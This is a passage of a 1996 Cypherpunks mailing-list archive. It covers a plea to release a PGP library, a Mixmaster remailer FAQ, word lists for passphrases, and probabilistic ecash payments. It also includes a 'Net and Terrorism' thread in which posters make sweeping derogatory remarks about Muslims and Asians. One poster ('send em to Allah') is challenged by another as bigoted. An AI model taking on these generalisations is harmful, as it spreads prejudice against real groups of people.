Folks

it's time to shit or get off the pot.

If what is holding us back is a PGPlib, (even though I personaly belive
it's a bit late, S-MIME is becoming pretty popular)  then either finish it,
or make it available for someone else to finish it.  I know that at least
on the Mac if there was a there was a PGPlib, you would have seen more than
one native email plug-in from the last Mac hack.

Maybe Macintosh developers havent done crypto for a variety of reasons,
whether it be NSA strong arming or not, BUT... I tell you as soon as
someone releases a  Mac CFM library that does crypto, thats when you will
see interfaces that Joe-sixpack will use. And none of this silly
telnet/unix shell I can't send my passphrase over the wire crap.
Hello...Thats why they (we) make powerbooks.

OH and I would suggest that you do make the interfaces/doc public in
several well-known places (TM) ASAP. cause like the AT&T commercial says,
have you ever been visited by the men with dark suits..you will.








Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie moscaritolo <vinnie@webstuff.apple.com>
Date: Fri, 5 Jul 1996 13:35:20 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <v03007600ae0219ea71e0@[38.26.2.85]>
MIME-Version: 1.0
Content-Type: text/plain


Since this has become terror-punks I guess I should throw my e$.02 into the
fray.

I have to agree with the entity that call himself snow that one of the
reasons that you don't see so much civil induced terrorism in the US, (as
oposed to terrorism the Feds do) is because there is so many channels for
free speach here. This helps to vent and depresurize the situations. There
is little need for organizations to underground, since most things can (or
used to be) be better done out in the open. In fact you will attract less
governement attention that way.

Take Greedpiece (typo) GreenPeace for instance, they are able to perform
thier forms of terrorism very overtly, same for Anti-Abortionists.

Sometimes I am astounded by the lack common sense that government officials
display. Bill Klinton and his media budies (Ted Copulate etc) are the best
recruiters for Militia groups, After the OKC bombing, his accusations of
Militia involvement pissed off so many middle of the roaders that
memberships showed a marked increase. Thanks to Sen Fineswine, Semi-Auto
purchases had a record year in California. (does she have stock in
Norinco?) There is no conspiricy on the governements part, just plain
stupidity.

>Then why do you float ideas such as buying out the Soviet arsenal if you
>think it isn't possible?

actually I know of an individual who did just that: he bought out an DDR
arsenal, and flew it into Ohio on a Soviet transport. Scared the shit out
of the  ATC working the airport that day. Result: large supply of Soviet
SKS, Moisan-Naggant and AK's for gunshops, just in time for the Fineswine
blue light special. he made big bucks.

>however, we will probably
>    see that again in parts of the world as many cultures do not have the
>basic
>    respect for life we do.  the first time you witness a small child begging
> for chocolate exploded by a remote control pressed by her father, you
> understand --you do not necessarily like it, it's just survival.
> and faced with a decision of giving up 'n' "friendlies" for 1000n, or even
>  more, to survive, I know where I stood, and still stand

Yes it does have a way of changing the way you look at the world. I only
wish the clowns in office who make the decisions that the grunts guarding
the embassies should have empty mags, could see any of this shit. War does
suck, and suck in a big way, and when your there, and I don't mean watching
it on CNN, you ARE in a world of hurt.

> if the U.S does adopt the police state tactics Bubba
>    is espousing, the U.S. will be faced with _real_ terror, not staged
>    incidents  to justify the martial law, etc.

Roger that, an I for one don't want to see that war fought on US soil. This
is the part that scares me the most.

So my point is, the more the government inflates a non existant problem,
the bigger the problem gets.  The part that really bothers me is that too
many times these are all diversion from important issues.    The American
people seem to be on a steady diet of OJ and CNN,  when the war, the real
war that will shape the future gets no media coverage. Things like
education, and economic strategy are just not sexy enough for TV.

>However, you will never be able to buy out  the religious terrorists
> --they are on a "mission."

I was always taught They have nothing left to lose..make em happy and send
em to Allah (or whatever) as quickly as you can.

>There is no cure for the "revolutionary" terrorists ..
> If we do not even print their obit, there is no glory!

Tim, you are asking for the liberal media to act responsibly.. what were
you thinking?

speaking of liberal media,  I have lost all creditibility with my Bostonian
friends this week trying to tell em about the feature I saw in the San Jose
TV news, where some animal expert actually suggested admininstrating
tranquilizers to the family poodle in preparation for 4th of July
festivities..something do with fireworks.  OK maybe in Santa Cruz the
animals (at least the ones downtown) are already on tranquilizers. But who
wants a dog that can't deal with loud noises anyways, he'd be useless for
huntin.


But what do I know.. I just practice law Samoan style.



Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Fri, 5 Jul 1996 16:10:32 +0800
To: mix-l@jpunix.com
Subject: Mix for PC: Mixmaster Remailer FAQ
Message-ID: <199607050451.VAA12470@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Frequently Asked Questions about Mixmaster Remailers
FAQ Verson 1.8 July 4 1996
by Lance Cottrell

This document is a semi-technical discussion of Mixmaster remailers.
I wrote this to answer questions often asked by new users of Mixmaster,
and to explain why you would want to use Mixmaster remailers.

***Announcements***
4 July 1996: Mixmaster for Dos and Windows is now available!

I am pleased to announce the release of Mixmaster 2.0.3
It contains many bug fixes, and a much improved Makefile which
makes compiling a snap!

***What is Mixmaster?***
Mixmaster is a new class of anonymous remailers. Inspired by the existing
"cypherpunk" remailers and discussions on the
Cypherpunk mailing list (cypherpunks@toad.com).
Mixmaster is the next generation in the evolution of remailer technology.

***What is an anonymous remailer?***
Quoting from Andre Bacard's remailer FAQ:

  An anonymous remailer (also called an "anonymous server")
  is a free computer service that privatizes your e-mail.
  A remailer allows you to send electronic mail to a Usenet
  news group or to a person without the recipient knowing
  your name or your e-mail address.

For a non-technical introduction to remailers (not including Mixmaster),
I recommend Andre's FAQ. It is posted regularly to:
  alt.privacy
  alt.privacy.anon-server
  alt.anonymous

or you can get it by sending mail to:
  To: abacard@well.com
  Subject: Help1
  Message: [Ignored]

There is also a version on the World Wide Web at
<http://www.well.com/user/abacard/remail.html>.

***What do I need to use Mixmaster remailers?***
Unlike other remailers, you can't just make your own message and send it
to the remailer. Mixmaster's security comes in part from using a special
message format. The disadvantage of this is that you need a special 
program to make the message for you. Once you have that program 
(the client) remailing is as easy as running the program, and telling it
which remailers you want to use.

***How do I get the Mixmaster client software?***
There are two sites for distribution. The first is 
at my site <http://www.obscura.com/~loki/Welcome.html/>,
or ftp to ftp.obscura.com and read /pub/remail/README.no-export</A>.
The other is by anonymous ftp to jpunix.com.

You will have to follow the instructions there to get Mixmaster.
Because Mixmaster contains cryptography, it may not be exported 
from the U.S and Canada. The reason for the circuitous route to download
Mixmaster is to show my good faith efforts to keep Mixmaster from being
exported. I understand that Mixmaster may be available in Europe from
ftp://utopia.hacktic.nl/pub/replay/pub/remailer

***How do I get the software to run a Mixmaster remailer?***
The remailer software is available from the same sites as the client.

***But I only see one Mixmaster distribution?***
The same program is used for both the client and the remailer. The only
difference is in the installation. For the client you just compile it
and you are ready to go. For the remailer, you need to set up mail
forwarding and cron jobs.

***What kinds of computers does Mixmaster run on?***
Unfortunately, not PCs or Macs. But it is being ported to those right now.
Mixmaster runs under UNIX. The only machine it is known not to work on
is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3,
Solaris, and several others. It has been compiled and tested on Netcom. 
If you use it on a machine or service not on this list, please let me 
know so I can add it.

***How does Mixmaster work, and why should I use it?***
You should use Mixmaster if you want the highest level of anonymity
available, or if your are tired of building remailer messages your self.
A discussion of how Mixmaster provides this level of security is beyond
the scope of this FAQ, but I put an essay on the subject on my home page.
<http://www.obscura.com/~loki/remailer/remailer-essay.html>

***Does Mixmaster use PGP?***
No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own
keys and key file formats. To add a key to a key ring, simply append 
the key to your key file using your favorite text editor.

***Can Mixmaster post to News?***
Yes, like older remailers some Mixmaster remailers can post to news.
Also like older remailers, not all Mixmaster remailers can post
to news. Request the remailer's help file to check if it supports
posting. Do this by sending mail to the remailer with the subject line 
  remailer-help
 
***When Was Mixmaster Released?***
Mixmaster was originally released on an experimental basis in late
1994. There were only ever two remailers running Mixmaster 1.0.
Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly
available Mixmaster remailers.

***What is the latest version of Mixmaster?***
Version 2.0.3 for Dos and Windows was released July 4 1996.

Version 2.0.3 was released on Nov 27, 1995. This version uses a new
Makefile, which makes compiling it a snap. Several bugs were also fixed,
and some esoteric functions added.

Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can
now accept messages containing multiple Mixmaster packets. Mixmaster
can be told to choose a random set of remailers to chain your message
through. It will now route multiple packet messages over independant
chains. Several minor bugs were fixed.

Version 2.0.1 was released on May 27, 1995. The only changes from 2.0
are some improvements in the documentation, and the inclusion of a 
more up to date list of remailers.

***What remailers run Mixmaster?***
The most recent list of remailers is available on my homepage,
<http://www.obscura.com/Welcome.html#list-files>
along with the remailer list and key file for Mixmaster. You can simply
replace your current type2.list and pubring.mix files with these.
They are also available from <http://www.jpunix.com>.
My list is simply a mirror of the one on Jpunix, which is maintained
(through much hard work) by John Perry.

<P>
Please send any questions you think should be here to:
loki@obscura.com.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdxm51Vkk3dax7hlAQGfwgP9FediBro7gdVMMjCffWToLyhr6HUagxSI
qcHhQU4jL1EWdebMwR6wqUBWuxDgrAsrSRT4WhftfSxTtCHCiSk9yXqg7HlRVPkx
VQ+7SCF5/gnTE3a/rvj+EbH2hjBdRZWLEOdOnv+Ej00rhCB4A9T2ASQjpcZZB1iT
zT+cSIlW3go=
=qKtd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.FL.us>
Date: Fri, 5 Jul 1996 13:22:56 +0800
To: cypherpunks@toad.com
Subject: InfoTrends ISTrends - Issue 55 (fwd)
Message-ID: <Pine.A32.3.91.960704222936.983397B-100000@fn1.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


Anybody know what this is about?  I noticed it in the current issue of 
Information Society Trends.  Thanks.  Happy Independence Day USA!  


---------- Forwarded message ----------
Date: Tue, 2 Jul 1996 16:00:49 +0200
From: ISPO Administrator <root@www.ispo.cec.be>
To: istrends@www.ispo.cec.be
Subject: InfoTrends ISTrends - Issue 55

Information Society Trends
Issue number: 55 - (13.6.96 - 27.6.96)

[big piece snipped out here] 

TECHNOLOGY

The Japanese Ministry of International trade and Industry (MITI) is
planning the launch in 1997 in collaboration with Japanese electronics and
computer firms of trials for an electronic certification system which
would be used for the transmission of formal documents as well as to
provide a high level of security for electronic commerce. 

[more stuff snipped out here]
__________________________________________________________________________
DGXIII - The content of "Information Society Trends" does not necessarily
reflect the European Commission's views. Also available electronically:
http:/www.ispo.cec.be/ispo/press.html E-mail subscription:
Majordomo@www.ispo.cec.be; enter SUBSCRIBE ISTRENDS + your e-mail address





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: predator <naim@micronet.fr>
Date: Fri, 5 Jul 1996 09:34:22 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
In-Reply-To: <31CDACD4.751@potlatch.esd112.wednet.edu>
Message-ID: <31DC3BCB.702C@micronet.fr>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 5 Jul 1996 11:32:16 +0800
To: tcmay@got.net
Subject: Re: Net and Terrorism.
Message-ID: <199607050037.RAA29288@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: tcmay@got.net
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from tcmay@got.net 07/04/96  5:43pm -0700 
 
= I recall that Attila is one of several Mormons on the list, from a 
= recent thread where I happened to mention Mormons as an example (and 
= got comments, including a statement that "Mormon" is a slur). 
=  
        your memory is correct as to my membership: I am an active 
    Elder and member of the Quorum of High Priests. The official name 
    of the church since 1838 (eight years after founding) is "The
    Church of Christ and the Latter Day Saints" --therefore preference
    for 'LDS' or 'Saints.' 

        the use of "Mormon" to describe our members is obvious from the
    "Book of Mormon,"  so named by the fact the prophet Mormon compiled
    and/or authored much of the book, although the last prophet and
    custodian was Moroni (the gold statue on top of LDS Temples is of
    Moroni). 
  
= Anyway, I should point out that Mormons (or Latter Day Saints, I 
= guess) are spreading quickly around the world...all WITHOUT using 
= "conversion by the  sword," as some other well-known religions are 
= wont to do. 
=  
        our mission is simple: we only ask that you read the material 
    (preferably including the Book of Mormon) and privately (possibly
    including your family) to get on your knees and humbly and openly
    pray to God to tell you if the LDS church is the restored Church of 
    Christ himself, as established before his crucifixion, 

        unfortunately, we have been met by the sword, including in 
    Utah, which was _occupied_ by Federal troops for almost 50 years
    and more than one U.S. Army was sent by Washington to subjugate
    and/or exterminate us.
 
= Islam, notably, was known for this policy of conversion by the sword: 
= entire national populations were given the choice of converting to 
= Islam or being put to the sword. Most converted, naturally enough. 
=  
= (cf. various histories, incl. Wright's "Sacred Rage.") 
=  
= Islam is one of the religions teaching that "martyrs" go directly to 
= Paradise/Heaven/Valhalla. A terrorist who explodes himself goes 
= directly to sit at Allah's dinner table. [snip...]
= 
= Personally, I expect to see more such "terrorist" acts in the 
= coming decades, in the U.S.) 
= 
        given the insolvency of the U.S. government and the absurd 
    ratios of stock values in the NYSE and NASDAQ --most of it on 10%,
    or less, margin, a total economic collapse is inevitable 

        --not if!   *when?*

        all the "safeguards" of FDR's Glass Act, the SEC, etc. are just
    so many words. the monied class and the manipulators are no less 
    than the moneychangers Jesus expelled from the temple in Jerusalem.
 
= Calling a spade a spade, Islam is in some sense a "terrorist 
= religion," in that physical force is seen by many Muslims as a 
= legitimate mechanism of conversion. [snip...]
=  
= We should all be thankful that Mormons, as economically powerful and 
= as well-organized as they are, steer far clear of this kind of 
= recruiting and service to their beliefs. 
=
        technically, we "turn the other cheek" as W.W. Phelps did when 
    the mobs in Jackson, MO tarred one cheek --he turned to make it 
    easier to tar the other.
  
= (It's been 30 years since I've been in Salt Lake City, but I 
= understand that strip clubs exist there--from reading certain news 
= groups!--and that alcohol is not illegal there. This government 
= tolerance of things inimical to the dominant religion would be 
= unthinkable in, say, Mecca.) 
= 
	our basic attitude is very simple: we do not believe in the
    consumption of liquor, tea, coffee, and drugs including nicotine 
    and caffeine. all members are not perfect, and many must restore 
    their faith by repentance; however, we believe all non-members are 
    free to practice _any_ religion of their choice, including in 
    indulging in [legal] harmful substances.

        I, myself, live in Southern Utah in a rural high desert
    community of <150 families. I suspect it would be difficult to
    obtain a drink!
  
        The LDS position of war and conscientious objects is dual: if
    you profess to your Bishop you wish to be a conscientious objector
    (following the example in Alma), you will be supported; or, if you 
    wish to be called to duty (as the striplings of Helaman who had
    not covenented to not raise arms). you will be supported, 

        as this example from the Discourses of Brigham Young:
  
	"When we were right in the midst of Indians, who were said to 
	be hostile, five hundred men were called to go to Mexico to 
	fight the Mexicans, and, said Mr. Benton -- 'If you do not send 
        them we will cover you up, and there will be no more of you.' 

	"...The boys in that battalion performed their duty faithfully. 
        I never think of that little company of men without the
        next thoughts being, "God bless them for ever and for ever." 
        All this we did to prove to the Government that we were 
        loyal.
        
        "...Thomas H. Benton, ...obtained the requisition to call for
        that battalion, and, in case of non-compliance with that
        requisition, to call on the militia of Missouri and Iowa, and
        other states, ...to destroy [us].  

        "This same Mr. Benton said to the President of the United
        States, in the presence of some other persons, 

            'Sir, they are a pestilential race, and ought to
                 become extinct.'"  

        [Discourses of Brigham Young 10:106] 
  
= There are of course other flavors of Islam, including arts-loving, 
= peace-loving, and scholarly sorts. The propagation of science and 
= math through the Dark Ages owes much to Arabic scholars, of course. 
= Hence, we cannot blanketly condemn Islam. 
=  
= However, for the sake of the discussion about terrorism, it's 
= important to recognize that some significant fraction of Muslims 
= believe these notions of martyrdom and are willing to engage in 
= horrific acts to accomplish certain ends. 
=  
= (The Arab world is very poorly connected to the Net at this time. 
= It'll be interesting to see what happens if and when they become 
= well-connected, with PGP, remailers, information markets, etc.) 
= 
        currently, the Arabs are poorly connected to the Internet due 
    to the fear of their despotic rulers that they will learn Western 
    ways, including democracy  --and, spread information and democracy 
    to rise against these leaders.  In Saudi Arabia, any usage of the 
    InterNet goes thru the official state provided (a clear case for a 
    satellite link).  Of course, it is illegal to own weird satellite 
    equipment.

        Attila  


960704:2359



--
Fuck off, Uncle Sam. Cyberspace is where democracy lives!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 5 Jul 1996 11:18:25 +0800
To: blanc <blancw@accessone.com>
Subject: RE: Net and Terrorism. (blanc@accessone.com)
Message-ID: <199607050037.RAA29295@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: blanc <blancw@accessone.com>
              Cypherpunks <cypherpunks@toad.com>

To: blanc <blancw@accessone.com>
From: attila <attila@primenet.com>
Reply-To: attila@primenet.com
Subject: RE: Net and Terrorism.

** Reply to note from blanc <blancw@accessone.com> 07/04/96 12:31am  
-0700 
 
= Could you explain your statement below:  
=   
= 	the first time you witness a small child begging for chocolate 
= exploded by a remote control pressed by her father, you understand 
= --you do not necessarily like it, it's just survival.  
=     
= Why was the child exploded? To kill the soldier it was requesting 
= chocolate from?  
=  
 
	human life is cheap in many non-Western countries, particularly 
    the orient.  Female children are considered expendable (in China 
    where parents are limited to one child; the abortion of a female 
    fetus is common). 
 
	children in war zones have always begged chocalate from 
    soldiers and even a small child can pack enough plastiques to wipe 
    out an entire patrol. 
 
	as I said, it is one or the other --the child dies either way, 
    and explosives are very messy. 
 
	no matter how war movies are glorified for joe six-pack, war is 
    still hell. 
 


--
Fuck off, Uncle Sam. Cyberspace is where democracy lives!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 5 Jul 1996 18:46:43 +0800
To: vinnie moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: Net and Terrorism.
In-Reply-To: <v03007600ae0219ea71e0@[38.26.2.85]>
Message-ID: <Pine.GUL.3.94.960705000230.16407F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 4 Jul 1996, vinnie moscaritolo wrote:

> Sometimes I am astounded by the lack common sense that government officials
> display. Bill Klinton and his media budies (Ted Copulate etc) are the best
> recruiters for Militia groups, After the OKC bombing, his accusations of
> Militia involvement pissed off so many middle of the roaders that
> memberships showed a marked increase. Thanks to Sen Fineswine, Semi-Auto

Middle of the roaders? Some road. :-) I get your drift, and I'm behind you,
but I think you're deluding youurself if you think you're anywhere near the
mainstream. Most people aren't that intelligent.

Yeah, I'm sure some good people like we'all joined the militia, but I'm
worried about the losers and loons like the "Vipers Militia." When the
barely literate who can't hold a job at a donut shop are convinced that it's
*K00L* to play with guns and bombs and prepare to fight The New World Order,
we have a problem. Even the very few real Nazis (as opposed to everybody the
SWC thinks are Nazis) are worried about the proportion of unstable loons in
their midst. There are good people in that racket who don't want to see
people hurt; I'm happy to have made some friends.

Of course you're right, much of the blame for that problem lies with the
stoopid gubmint that lacks a proper regard for the Bill of Rights, not to
mention a Sense of Huumor. Absent the fearmongering, the Viperweenies would
have turned to something else antisocial, buut they wouldn't have had a
"movement" to cling to. (Or maybe they would have... in another era, they
would have joined up with the Weathermen or the Symbionese Liberation Army.)

Fortunately, and despite what, say, the SWC says in its fundraising
materials, the middle of the road among the militias isn't that kooky. Bo
Gritz and the leaders of the Michigan Militia were heard calling the Freemen
a bunch of lying scum; I've observed more mainstream (if that's the word) 
militiafolk distancing themselves from the Viperweenies both online and on
shortwave.

> purchases had a record year in California. (does she have stock in
> Norinco?)

I'm sure it's a blind trust.

> There is no conspiricy on the governements part, just plain
> stupidity.

Absolutely, on both sides of that walnut.
 
> So my point is, the more the government inflates a non existant problem,
> the bigger the problem gets.

Government or whomever...

> >However, you will never be able to buy out  the religious terrorists
> > --they are on a "mission."
> 
> I was always taught They have nothing left to lose..make em happy and send
> em to Allah (or whatever) as quickly as you can.

Since the two muslims who used to give a shit about this list seem to have
left in disgust, I suppose I should register my "That ain't representative
of Islam, any more than Pete Peters is representative of Christianity or
Lenin is representative of atheism." I think this falls under the category
of "the more you inflate a nonexistent problem, the bigger it gets." Yes
there is an unusually high proportion of loons in charge of movements that
call themselves Islamic Fundamentalist, but do you really think it's in your
interest to talk like, well, a bigot and turn the rest of the muslims
against you? 

- -rich
 http://www.c2.org/~rich/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMdzGDZNcNyVVy0jxAQFDAQH/cy1hWsH29dj3AHWaH8Z5I9BxDgoPtbYB
4cVL5T0mOLiP5aW/OjP05e4yF9Y1r4af+iI0x9u8yuc6ly8NOzOK9g==
=Qoe2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 5 Jul 1996 15:44:36 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <960705010023_427891194@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-07-04 16:37:24 EDT, fair@clock.org (Erik E. Fair)
writes:

>You could just snarf up a week's worth of netnews...
>
>        Erik
>
>
>

There are many out there. And I doubt the net would have anything like
Antidisestablishmentarianism heheh
I believe it was an 8 meg wordlist I got off the net. Just use the good ole
search utils!! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Fri, 5 Jul 1996 19:55:03 +0800
To: gregmi@galileo.mis.net
Subject: Re: Word lists for passphrases
Message-ID: <Pine.SUN.3.94.960705020939.22576A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Greg,

>Are there any publically available word lists which contain just about
>every word in the English language?  It's not absolutley necessary,
>but I'd also like the list to include english names.

I would try this site out, It is very complete and should fill the bill.

ftp://sable.ox.ac.uk/pub/wordlists/

Good Luck!


-William Knowles
 erehwon@c2.org
 Finger for public key



--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jul 1996 20:41:45 +0800
To: Steve Reid <root@edmweb.com>
Subject: Re: ecash thoughts
Message-ID: <199607051008.DAA03805@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:18 PM 7/4/96 -0700, Steve Reid wrote:

>The person wanders around the web, acting as though he's perfectly willing
>to pay, and participating in the fair coin tosses. Except, he really has
>no intention of paying. He will gain free access to 9 out of 10 sites, and
>on the ones that he loses the 1/10 gamble, he just backs out of the deal
>and doesn't pay anything. The end result is that instead of seeing all of
>the web at 0.1 cents per page, he sees 90% of the web completely for 
>free. If everyone does this, the sites will go broke.
>
>It's the equivalent of welshing on a bet.
>
>The obvious solution would be to require that the person pay the 1 cent,
>then if he wins the 9/10 bet, he gets the 1 cent back. But that will just
>move the problem from the user to the server- the site can welsh on the
>bet and refuse to pay back the one cent. They will get ten times the
>payment that they are supposed to get. 

If  you're a store and I want to buy something that costs, say, $4.50, and 
we want to eliminate the need for change (for whatever reason) then I would 
pay $4.00 up front and we'll flip the electronic coin for the rest.  At that 
point, you already have $4 so I'd have no reason to welsh on the remaining 
50 cents.

It obviously doesn't work this way if the minimum coin is larger than the 
current purchase...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 5 Jul 1996 20:40:36 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
In-Reply-To: <ae0204ac01021004e601@[205.199.118.202]>
Message-ID: <Pine.GUL.3.94.960705025834.17213A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jul 1996, Timothy C. May wrote:

> At 2:37 AM 7/5/96, vinnie moscaritolo wrote:
> 
> >>There is no cure for the "revolutionary" terrorists ..
> >> If we do not even print their obit, there is no glory!
> >
> >Tim, you are asking for the liberal media to act responsibly.. what were
> >you thinking?
> 
> I did not write that.
> 
> However, I wouldn't think that "not printing their obit" is acting
> responsibly. As far as I'm concerned, I want the full news, or at least
> some reasonable approximation of it, not propaganda.

The issue here is that terroristic actions *are* propaganda. Does every
idiot with a bomb deserve to be really big news? 

Anyway, I don't think Vinnie was suggesting that the news be censored --
just that the press doesn't have an obligation to print the obituary the
"martyrs" want. There's a spectrum from "the popular front for the
liberation of kooks, which believed blah blah blah because blah blah blah,
just blew up a building" to "some kook just blew up a building." The latter
is usually sufficient. If I care about the kooks, I can look them up, but
I don't think the fact that they blew up a building gives them the right to
propagandize the front page of my newspaper.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jul 1996 17:41:28 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <ae0204ac01021004e601@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:37 AM 7/5/96, vinnie moscaritolo wrote:

>>There is no cure for the "revolutionary" terrorists ..
>> If we do not even print their obit, there is no glory!
>
>Tim, you are asking for the liberal media to act responsibly.. what were
>you thinking?

I did not write that.

However, I wouldn't think that "not printing their obit" is acting
responsibly. As far as I'm concerned, I want the full news, or at least
some reasonable approximation of it, not propaganda.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: talon57@well.com
Date: Sat, 6 Jul 1996 01:48:28 +0800
To: cypherpunks@toad.com
Subject: RE: Net and Terrorism
Message-ID: <199607051432.HAA25401@well.com>
MIME-Version: 1.0
Content-Type: text/plain




Tim May wrote:

>Again, the Sarin attack in Tokyo had nothing to do with former
>U.S.S.R. CBW weapons. Chemical and biological agents are cheap to
>make, especially in the quanties needed to kill only a few
>thousand people, and in the non-battlefield delivery environment.

Actually Tim, the Aum Supreme truth cult was using a Russian
formula for it's production of sarin, and was spending vast amounts
of time and money trying to obtain Russian NBC expertise. They
supposedly had an estimated 30,000 followers in the former Soviet
union.

I recently finished an excellent book "The cult at the end of the
world" about all this and highly recommend it to my fellow
cypherpunks.

Brian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jul 1996 17:19:55 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <ae020612020210043a30@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:00 AM 7/5/96, AwakenToMe@aol.com wrote:
>In a message dated 96-07-04 16:37:24 EDT, fair@clock.org (Erik E. Fair)
>writes:
>
>>You could just snarf up a week's worth of netnews...
>>
>>        Erik

>There are many out there. And I doubt the net would have anything like
>Antidisestablishmentarianism heheh
>I believe it was an 8 meg wordlist I got off the net. Just use the good ole
>search utils!!

The standard "large data base" of modern American English words is the
"Brown corpus." Search the Web for this and you'll get a few hundred hits,
including some downloadable files.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jul 1996 17:48:34 +0800
To: cypherpunks@toad.com
Subject: Re: ecash thoughts
Message-ID: <ae02088a04021004ce8f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



First, I'm not very convinced that probabalistic payments are needed. And
I'm mostly convinced that most users of digital money will be skeptical
too.

A few comments:

At 9:18 PM 7/4/96, Steve Reid wrote:

>Suppose someone is surfing the web or whatever, and various sites are
>charging, say, 0.1 cents per web page, via probabilistic payments.
>Suppose there is a 1 in 10 chance that the person will pay 1 cent.
>
>The person wanders around the web, acting as though he's perfectly willing
>to pay, and participating in the fair coin tosses. Except, he really has
>no intention of paying. He will gain free access to 9 out of 10 sites, and
>on the ones that he loses the 1/10 gamble, he just backs out of the deal
>and doesn't pay anything. The end result is that instead of seeing all of
>the web at 0.1 cents per page, he sees 90% of the web completely for
>free. If everyone does this, the sites will go broke.

I cannot imagine _any_ protocol for probabalistic payments which "allows"
someone to back out of the deal once they've seen the outcome of the coin
toss (or whatever). That just makes no sense. Exactly how the deal works to
force completion is another matter (maybe escrow, maybe the symmetric
payment scheme described here recently, etc.).

>The obvious solution would be to require that the person pay the 1 cent,
>then if he wins the 9/10 bet, he gets the 1 cent back. But that will just
>move the problem from the user to the server- the site can welsh on the
>bet and refuse to pay back the one cent. They will get ten times the
>payment that they are supposed to get.

Reputations matter, too, so sites or customers who renege will have their
reps diminished, in the ways we talk about so often here. (Analogies in the
physical world today: casinos who fail to pay off winnings, customers of
casinos who fail to pay off their markers, etc.)

I don't believe probabalistic payments have any special problems with
renege rates. However, I also don't think this is a promising area.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
